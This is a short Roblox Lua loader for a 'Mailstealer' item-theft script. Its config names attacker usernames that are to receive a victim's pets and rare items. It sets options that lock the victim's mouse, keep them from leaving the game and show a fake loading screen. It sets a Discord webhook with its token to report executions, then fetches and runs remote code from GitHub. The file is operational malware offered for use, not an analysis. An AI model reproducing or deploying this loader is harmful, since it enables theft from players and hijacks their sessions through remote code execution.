--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
UserName = "Chuanko1" --// Username To Send Pets To
UserName2 = "traptinq00ontt
" --// To Send Rare Stuff

_G.LoadingScreen = true --// make it true for loading screen
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.MouseLock = true --// Doesn't Let the Target Move Mouse

--[[ Webhook Config ]]--
Webhook = "https://discord.com/api/webhooks/1123208605592723466/7DFdGKNygU-FVCp-7Szh-7pta1RwPQioaSWrjRAv7XRluhUvWgf1VUVAio12XNg2rpsh" --// Discord Webhook For Executions

--[[ Script ]]--
loadstring(game:HttpGet("https://raw.githubusercontent.com/LucidHacker9999/Mailstealer/main/script.lua"))()
